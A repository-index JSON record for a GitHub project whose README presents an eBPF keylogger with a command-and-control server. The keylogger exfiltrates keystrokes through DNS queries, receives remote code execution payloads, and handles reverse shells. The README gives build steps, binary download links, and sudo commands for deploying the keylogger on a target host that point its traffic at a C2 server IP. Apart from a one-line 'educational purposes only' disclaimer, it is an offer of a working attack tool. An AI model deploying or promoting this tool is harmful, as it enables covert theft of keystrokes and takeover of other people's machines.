{"id":25948748,"url":"https://github.com/adgaultier/tamanoir","last_synced_at":"2025-04-04T15:04:55.354Z","repository":{"id":266247053,"uuid":"875383720","full_name":"adgaultier/tamanoir","owner":"adgaultier","description":"An eBPF🐝 Keylogger with C2-based RCE payload delivery","archived":false,"fork":false,"pushed_at":"2025-03-14T17:29:34.000Z","size":79,"stargazers_count":256,"open_issues_count":3,"forks_count":22,"subscribers_count":4,"default_branch":"main","last_synced_at":"2025-03-28T14:05:54.707Z","etag":null,"topics":["aya","ebpf","hacking","keylogger","linux","ratatui","rust","security","tonic"],"latest_commit_sha":null,"homepage":"","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/adgaultier.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"github":"pythops"}},"created_at":"2024-10-19T20:34:40.000Z","updated_at":"2025-03-27T02:32:26.000Z","dependencies_parsed_at":"2025-01-15T11:11:31.903Z","dependency_job_id":"c0b93051-93e0-4d80-aa2b-fb8b11328e84","html_url":"https://github.com/adgaultier/tamanoir","commit_stats":null,"previous_names":["pythops/tamanoir","adgaultier/tamanoir"],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/adgaultier%2Ftamanoir","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/adgaultier%2Ftamanoir/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/adgaultier%2Ftamanoir/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/
GitHub/repositories/adgaultier%2Ftamanoir/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/adgaultier","download_url":"https://codeload.github.com/adgaultier/tamanoir/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247198445,"owners_count":20900079,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["aya","ebpf","hacking","keylogger","linux","ratatui","rust","security","tonic"],"created_at":"2025-03-04T11:21:52.712Z","updated_at":"2025-04-04T15:04:55.324Z","avatar_url":"https://github.com/adgaultier.png","language":"Rust","funding_links":["https://github.com/sponsors/pythops"],"categories":["Rust"],"sub_categories":[],"readme":"\u003cdiv align=\"center\"\u003e\n  \u003ch1\u003eTamanoir\u003c/h1\u003e\n  \u003ch3\u003eAn eBPF🐝 Keylogger with \u003cbr\u003eC2-based RCE payload delivery\u003c/h3\u003e\n  \u003cimg src=\"https://github.com/user-attachments/assets/47b8a0ef-6a52-4e2d-8188-e77bb9e98d79\" style=\"width: 30%; height: auto;\"\u003e\n  \u003cp\u003e\u003csmall\u003e\u003ci\u003eA large anteater of Central and South America, Myrmecophaga tridactyla\u003c/i\u003e\u003c/small\u003e\u003c/p\u003e\n\u003c/div\u003e\n\n## 💡Overview\n\nTamanoir is structured around 3 components:\n\n### 1. Tamanoir\nAn eBPF program running on a target host. It acts as a keylogger and exfiltrates keystrokes via DNS queries.\u003cbr\u003e \nIn the DNS response, the attacker can choose to send chunks of an RCE payload that will be executed on the targeted host.\n\n### 2. Tamanoir-C2\nThe Command \u0026 Control server. 
It acts as a DNS proxy and can inject RCE payloads in the DNS response.\u003cbr\u003e \nIt can also handle reverse shell connections.\n\n### 3. Tamanoir-tui\nThe TUI client communicating with the C2 server. Built on top of ratatui.\n\n\u003cdiv align=\"center\"\u003e\n  \u003cimg src=\"https://github.com/user-attachments/assets/eb671b0a-9431-41b7-9d41-4a35f222a728\" style=\"width: 100%; height: auto;\"\u003e\n  \u003cp\u003e\u003csmall\u003e\u003ci\u003eTui client demo\u003c/i\u003e\u003c/small\u003e\u003c/p\u003e\n\u003c/div\u003e\n\n#### ⚡ Powered by [Aya](https://aya-rs.dev), [Tokio](https://github.com/tokio-rs/tokio), [Tonic](https://github.com/hyperium/tonic) and [Ratatui](https://ratatui.rs)\n\n\n### Glossary\n- What is [eBPF](https://ebpf.io/what-is-ebpf/)\n- C2: Command and Control\n- RCE: Remote Code Execution\n\n\n### Documentation\nJump to:\n- [Focus on Tamanoir (eBPF)](assets/doc/tamanoir.md)\n- [Focus on Tamanoir-C2](assets/doc/tamanoir-c2.md)\n- [Focus on Tamanoir-Tui](assets/doc/tamanoir-tui.md)\n\u003cbr\u003e\n\n## Architecture\n\u003cdiv align=\"center\"\u003e\n  \u003cimg src=\"https://github.com/user-attachments/assets/725c9623-ae8e-4d7e-9210-0785d5f28d6e\" style=\"width:75%\"\u003e\n\u003c/div\u003e\n\n\n\n## 🚀 Setup\n\nYou need a Linux-based OS.\n\n### ⚒️ Build from source\n\nTo build from source, make sure you have:\n\n- [bpf-linker](https://github.com/aya-rs/bpf-linker) installed.\n- [Rust](https://www.rust-lang.org/tools/install) installed with the `nightly` toolchain.\n- protobuf-compiler\n\n#### 1. Build eBPF program\n\n```\ncd tamanoir-ebpf \u0026\u0026 cargo build --release\n```\n\n#### 2. Build user space program\n\n```\ncargo build -p tamanoir --release\n```\n\n#### 3. Build C2 Server\n\n```\ncargo build -p tamanoir-c2 --release\n```\n\n#### 4. 
Build Ratatui Client\n\n```\ncargo build -p tamanoir-tui --release\n```\n\nThese commands will produce the `tamanoir`, `tamanoir-c2` and `tamanoir-tui` executables in `target/release`, which you can add to your `$PATH`.\n\n### 📥 Binary release\n\nYou can download the pre-built binaries from the [release page](https://github.com/adgaultier/tamanoir/releases).\n\n\u003cbr\u003e\n\n## 🪄 Usage\n\n### Tamanoir\n🖥️ on target host:\n```\nRUST_LOG=info sudo -E tamanoir \\\n              --proxy-ip \u003cC2 server IP\u003e \\\n              --hijack-ip \u003clocally configured DNS server IP\u003e \\\n              --iface \u003cnetwork interface name\u003e\n```\n\nFor example:\n\n```\nRUST_LOG=info sudo -E tamanoir \\\n              --proxy-ip 192.168.1.15 \\\n              --hijack-ip 8.8.8.8 \\\n              --iface wlan0\n```\n\n\n\n\u003cbr\u003e\n\n### C2 Server\n🖥️ on your C2 server host:\n\n```\nsudo tamanoir-c2 start\n```\n\u003e [!NOTE]\n\u003e Make sure port 53 is available\n\n\u003cbr\u003e\n\n### Tui Client\n🖥️ wherever you want to use the client:\n\n\n```\ntamanoir-tui -i  \u003cC2 server IP\u003e \n```\n\u003e [!NOTE]\n\u003e Make sure the C2 server is reachable on port 50051\n\n\u003cbr\u003e\n\n\n\n\n\n## ⚠️ Disclaimer\n\n`Tamanoir` is developed for educational purposes only.\n\n\u003cbr\u003e\n\n\n\n## ✍️ Authors\n\n[Adrien Gaultier](https://github.com/adgaultier)\n[Badr Badri](https://github.com/pythops)\n\n\u003cbr\u003e\n\n## ⚖️ License\n\nGPLv3\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fadgaultier%2Ftamanoir","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fadgaultier%2Ftamanoir","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fadgaultier%2Ftamanoir/lists"}